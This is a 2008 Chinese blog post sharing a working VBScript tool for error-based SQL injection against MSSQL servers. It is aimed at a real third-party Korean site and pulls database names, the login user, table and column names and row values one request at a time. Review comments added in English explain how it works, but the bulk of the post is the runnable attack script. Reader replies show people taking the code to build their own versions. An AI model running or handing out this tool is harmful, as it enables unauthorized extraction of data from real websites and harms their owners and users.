Sql2005注射辅助脚本[粗糙版]
2008/04/14 01:09 P.M.

'***********************************************************************************************
'Sql2005注射辅助脚本[粗糙版] 用于mssql显错模式 By Tr4c3[at]126[Dot]com        
'亦适用于MSSQL 2000的注射,不过2000还是用nbsi和Pangolin。           
'***********************************************************************************************
'为了保持脚本的通用性,放弃了 and (select col_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入

' ---------------------------------------------------------------------------
' Script-level configuration and command dispatch.
'
' This is a flat cscript program: the constants below configure transport and
' output, the target URL is split into base URL and query string, and the
' command-line arguments (Wscript.Arguments) select one of four enumeration
' modes. Each mode builds an MSSQL error-based probe of the form
'   and quotename(<expr>)=0--
' and hands it to SqlInj, which appends it to the original query string and
' scrapes the echoed error text. The comparison of a bracket-quoted name with
' the integer 0 is what is expected to make the server raise a conversion
' error that echoes the name back; SqlInj looks for the text between "'[" and
' "]'" in the response and stores it in the script-level strD. Every loop
' below runs until strD comes back empty, i.e. until a probe produces no
' echoed name.
'
' Review notes:
'  - None of the loops has an upper bound. If the response page always
'    contains a "'[ ... ]'" pair for reasons unrelated to the probe (static
'    text, a different error), strD is never empty and the loop never ends.
'  - Args(0..2) are spliced verbatim into the generated SQL (database, table
'    and column names). They come from the operator, not from the target, but
'    a name containing a quote or bracket will break the probe.
'  - There is no Option Explicit and no On Error handling; a network or COM
'    failure inside SqlInj terminates the script with a runtime error.
' ---------------------------------------------------------------------------

Const method = "Get" ' Transport used by SqlInj: "Get" or "Post" (compared case-insensitively).
Const DisPlay = "D" ' Output sink used by ResuT: "S" appends to result.txt, "D" echoes to the console.

Dim strUrl_B, strUrl, i, k, MyArray, strArg, strD

' Target URL including the injectable parameter. The trailing ' is part of the
' payload: it is meant to close the server-side string literal before the
' " and ..." probe is appended (whether that matches the target's SQL is up to
' the operator). Everything after the first "?" becomes strArg; a second "?"
' would be split off and silently dropped, since only MyArray(0) and
' MyArray(1) are read.
' NOTE(review): this is a real third-party hostname left in the published
' script. Replace it with a placeholder and only point the script at systems
' you are explicitly authorized to test.
strUrl_B = "http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'" ' Must be edited by hand for each injection point.
i = 1 ' Starting database id passed to db_name(i) in the "databases" mode.
k = 0 ' Starting row offset used as TOP k in the table/column/value modes.
MyArray = Split(strUrl_B, "?", -1, 1)
strUrl = MyArray(0) ' Base URL (scheme, host, path).
strArg = MyArray(1) ' Original query string; SqlInj appends each probe to it.
Set Args = Wscript.Arguments

' No arguments: print usage. ShowU calls Wscript.Quit, so nothing below runs.
If Args.Count = 0 Then
ShowU
End If
' Dead remnant of an earlier dispatch condition; left in place intentionally.
'If Args.Count =1 And LCase(Args(0))

'************************************************************************
'                        Databases / basic info
'************************************************************************
' "databases": walk db_name(1), db_name(2), ... until a probe yields no name.
' NOTE(review): this presumes database ids are contiguous; a gap (e.g. a
' dropped database) would end the walk early — confirm against the target.
' "info": current database, login user and system_user, one probe each.
If Args.Count =1 Then
If LCase(Trim(Args(0)))="databases" Then
   ResuT("---------------===============================--------------")
   ResuT("All The DataBases:")

   Do
    strData = " and quotename(db_name("&i&"))=0--"
    sqlInj(strData)
    i = i + 1
   Loop Until StrD=""
   ResuT("---------------===============================--------------")
   Wscript.Quit
ElseIf LCase(Trim(Args(0)))= "info" then
   ResuT("---------------===============================--------------")
   ResuT("The Current Database is:")
   strData = " and quotename(db_name())=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The database User is:")
   strData = " and quotename(user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   ResuT("The System_user is:")
   strData = " and quotename(System_user)=0--"
   sqlInj(strData)
   ResuT("---------------===============================--------------")
   Wscript.Quit
End If
End If
'************************************************************************
'                              Tables
'************************************************************************
' "<db> tables": enumerate <db>.dbo.sysobjects rows with xtype = char(85)
' ('U'), one name per request, skipping the first k names already seen.
' Args(0) is interpolated into the SQL without any quoting or validation.
If Args.Count=2 And LCase(Trim(Args(1)))="tables" Then
ResuT("---------------===============================--------------")
ResuT("The Tables Of " & Args(0))
Do
   strData = " and (select top 1 quotename(name) from "& Args(0) & ".dbo.sysobjects where xtype=char(85) AND name not in (select top "& k &" name from "&Args(0)&".dbo.sysobjects where xtype=char(85)))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                              Columns
'************************************************************************
' "<db> <table> cols": enumerate <db>.DBO.SYSCOLUMNS rows whose id matches
' object_id('<db>.dbo.<table>'), one column name per request. Both names are
' spliced into the SQL verbatim.
If Args.Count=3 And LCase(Trim(Args(2)))="cols" Then
Database = Args(0)
Table = Args(1)
TarGet = DataBase & ".dbo." & Table
TarGetCol = Database & ".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("The Columns Of " & TarGet)
Do
   strData = " and (select top 1 Quotename(name) from "& TarGetCol &" where id=object_id('"& TarGet &"') and name not in (select top "&k&" name from "& TarGetCol &" where id=object_id('"& TarGet &"')))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

'************************************************************************
'                              Values
'************************************************************************
' "<db> <table> <col> values": dump one value of <col> per request using
' "TOP 1 ... NOT IN (SELECT TOP k ...)" to page through the rows.
' NOTE(review): there is no ORDER BY, so the TOP k row set is not guaranteed
' to be stable between requests, and a NULL in <col> makes the NOT IN
' predicate match nothing — either can end the dump early or repeat rows.
' A value containing "]'" would also be truncated by SqlInj's parser.
If Args.Count=4 And LCase(Trim(Args(3)))="values" Then
Database = Args(0)
Table = Args(1)
col = Args(2)
Target = Database & ".dbo." & Table
ResuT("---------------===============================--------------")
ResuT("The Values Of " & Args(2) & " in "&Target)
Do
   strData = " and (select top 1 quotename("& col &") from "& Target & " where "& col &" not in (select top "& k &" "& col &" from "& Target &"))=0--"
   sqlInj(strData)
   k = k + 1
Loop Until StrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
End If

' Send one probe to the target and scrape the echoed identifier.
'
' value   SQL fragment (e.g. " and quotename(db_name())=0--") that is appended
'         to the script-level strArg (the original query string) to form the
'         request parameters.
'
' Side effects: sets the script-level strD to the text found between the
' first "'[" and the first "]'" in the response body, and echoes it via ResuT
' prefixed with " |_"; if that pair is not present strD is set to "". Callers
' use strD="" as their loop-termination signal.
'
' Transport is chosen by the script-level Const method. Both branches are the
' same except for the HTTP verb and body handling:
'  - GET: the parameters are placed directly in the URL with no URL encoding.
'  - POST: the parameters are sent as the form body, after UrlEncode, which
'    only turns spaces into "+".
' The request is synchronous (async flag False). A Referer header set to the
' base URL is sent in both cases. There is no error handling here, so a
' failed connection raises a script-level runtime error.
' NOTE(review): the two branches duplicate the response parsing; a shared
' helper would remove the copy-paste.
Sub SqlInj(value)
If UCase(method) = "GET" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "GET", strUrl &"?" & value , False
   objXML.SetRequestHeader "Referer", strUrl
   'objXML.SetRequestHeader "Accept-Language", "EUC-KR"
   objXML.send()
   strRevS = objXML.ResponseText ' Default decoding.
   'strRevS = bytes2BSTR(objXML.ResponseBody) ' Alternative raw-byte decoding; the author used it for Korean pages.
   ' Extract the bracket-quoted name that quotename() put into the error text.
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
ElseIf UCase(method) = "POST" Then
   value = strArg & value
   Set objXML = CreateObject("Microsoft.XMLHTTP")
   objXML.Open "POST", strUrl, False
   objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
   objXML.SetRequestHeader "Referer", strUrl
   objXML.send(UrlEncode(value))
   strRevS = objXML.ResponseText ' Default decoding.
   'strRevS = bytes2BSTR(objXML.ResponseBody) ' Alternative raw-byte decoding; the author used it for Korean pages.
   ' Same extraction as the GET branch.
   If InStr(strRevS,"'[")<>0 And InStr(strRevs,"]'")<>0 Then
    strD = Mid(strRevS,InStr(strRevS,"'[")+2, InStr(strRevs,"]'") - Instr(strRevS,"'[")-2)
    ResuT(" |_"&strD)
   Else
    strD = ""
   End If
End If
End Sub

' Emit one line of output to the sink selected by the script-level Const DisPlay.
'
' strInfo  The text to write.
'
' "S": append strInfo as a line to result.txt (OpenTextFile mode 8 =
'      ForAppending, create = True) in the current working directory; the
'      file is reopened and closed on every call.
' "D": write strInfo to the console with Wscript.Echo.
' Any other value of DisPlay writes nothing.
'
' Declared as a Function but never assigns a return value, so it returns Empty.
Function ResuT(strInfo)
If UCase(DisPlay) = "S" Then
   Set fso = CreateObject("Scripting.FileSystemObject")
   Set fso1 = fso.OpenTextFile("result.txt",8,True)
   fso1.WriteLine(strInfo)
   fso1.Close
   Set fso = Nothing
ElseIf UCase(DisPlay) = "D" Then
   Wscript.Echo(strInfo)
End If
End Function

' Minimal "encoder" for the POST body: only replaces spaces with "+".
'
' str  The query-string-style parameter text to send.
'
' NOTE(review): this is not real application/x-www-form-urlencoded encoding.
' Characters such as "&", "=", "+", "%" and "#" inside the payload are sent
' as-is and may be interpreted by the server as parameter separators or
' escapes, so a probe containing them can be misparsed in POST mode.
Function UrlEncode(str)
str = Replace(str," ","+")
UrlEncode = str
End Function

' Convert a raw byte array (e.g. XMLHTTP.ResponseBody) to a VBScript string.
'
' vIn  Byte array to decode.
'
' Bytes below &H80 map one-to-one via Chr. A byte of &H80 or above is treated
' as the lead byte of a two-byte character: it is combined with the following
' byte as lead*&H100 + trail and passed to Chr, and the trail byte is skipped.
' The result of Chr on such a code depends on the system locale; the author's
' comments say this was used for Korean pages — confirm for other encodings.
'
' NOTE(review): the loop variable i is not declared locally, so it appears to
' reuse the script-level i declared at the top of the file and will overwrite
' it — harmless only while this function is called from commented-out code.
' NOTE(review): a lead byte (>= &H80) at the very last position reads
' MidB(vIn, i+1, 1) past the end, which yields "" and makes AscB raise.
Function bytes2BSTR(vIn)
    strReturn = ""
    For i = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn,i,1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn,i+1,1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

' Print the usage banner and terminate the script.
'
' Called when the script is started without arguments. The usage lines list
' the four modes dispatched at top level: info, databases, <db> tables,
' <db> <table> cols and <db> <table> <col> values. Ends with Wscript.Quit,
' so control never returns to the caller. (Usage text is emitted at run time
' and is left in the author's language.)
Sub showU()
With Wscript
   .Echo("+--------------------------=====================------------------------------+")
   .Echo("Sql2005注射辅助脚本(粗糙版),用于mssql显错模式 By Tr4c3[at]126[Dot]com")
   .Echo("Usage:")
   .Echo(" cscript "&.ScriptName&" info--爆基本信息")
   .Echo(" cscript "&.ScriptName&" databases--爆所有库名")
   .Echo(" cscript "&.ScriptName&" pubs tables--爆库pubs里所有用户表名")
   .Echo(" cscript "&.ScriptName&" pubs authors cols--爆库pubs里authors表的所有字段名")
   .Echo(" cscript "&.ScriptName&" pubs authors au_id values--爆pubs.dbo.authors里au_id的值")
   .Echo("+--------------------------=====================------------------------------+")
   .Quit
End with
End Sub


网友评论:
1
2008/04/16 09:11 P.M. | 回复
遇到好多都是2005的 郁闷那 拿走了
 
2
2008/04/23 07:08 P.M. | 回复
偷一个~~~,嘿嘿,准备按这个去写个EXE去~
 
3
2008/11/07 10:02 A.M. | 回复
T啊,写个EXE版本吧。。这个效率也太低了
 
4
2008/11/07 05:32 P.M. | 回复
VBS有vbs的好处啊,方便修改,注入的时候情况是千变万化的。有代码可以灵活点,而且我感觉vbs也不慢。
 
5
2008/11/10 06:23 P.M. | 回复
小弟偷了点代码,请批准!
 
6
2008/11/10 07:49 P.M. | 回复
可随意修改,不介意的话改好的可以发一份给我。
 